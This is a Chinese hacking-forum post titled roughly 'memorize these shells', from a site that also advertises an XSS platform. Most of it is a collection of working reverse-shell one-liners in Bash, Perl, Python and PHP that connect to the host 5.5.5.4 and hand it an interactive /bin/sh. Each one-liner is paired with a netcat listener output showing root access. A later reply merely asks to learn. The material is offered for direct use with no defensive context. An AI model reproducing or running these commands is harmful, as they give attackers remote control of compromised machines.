切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
261 熟背 SHELL! 各种SHELL[复制链接]
发表于 2012-9-12 00:12:10 | 显示全部楼层 |!read_mode!

熟背

Bash

操作:

  1. root@ubuntu:~# exec 5<>/dev/tcp/5.5.5.4/4444
  2. root@ubuntu:~# cat <&5 | while read line; do $line 2>&5 >&5; done
复制代码
获得SHELL:

  1. root@Dis9Team:~# nc -v -l 4444
  2. Connection from 5.5.5.8 port 4444 [tcp/*] accepted
  3. id
  4. uid=0(root) gid=0(root) groups=0(root)
复制代码
Bash2
  1. root@ubuntu:~# bash -i >& /dev/tcp/5.5.5.4/4444 0>&1
复制代码
获得SHELL
  1. root@Dis9Team:~# nc -v -l 4444
  2. Connection from 5.5.5.8 port 4444 [tcp/*] accepted
  3. root@ubuntu:~# id
  4. id
  5. uid=0(root) gid=0(root) groups=0(root)
  6. root@ubuntu:~#
复制代码
PERL
  1. root@ubuntu:~# perl -e 'use Socket;$i="5.5.5.4";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
复制代码
连接
  1. root@Dis9Team:~# nc -l 1234
  2. # id
  3. uid=0(root) gid=0(root) groups=0(root)
复制代码
Python
  1. root@ubuntu:~# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("5.5.5.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
复制代码
连接
  1. root@Dis9Team:~# nc -l 1234
  2. # id
  3. uid=0(root) gid=0(root) groups=0(root)
复制代码
PHP
  1. root@ubuntu:~# php -r '$sock=fsockopen("5.5.5.4",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
复制代码
连接
  1. root@Dis9Team:~# nc -l 1234
  2. # id
  3. uid=0(root) gid=0(root) groups=0(root)
复制代码




操千曲而后晓声,观千剑而后识器。
发表于 2016-9-23 13:49:54 | 显示全部楼层
求学啦。。。。。

代码区

GMT+8, 2020-10-26 09:21

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部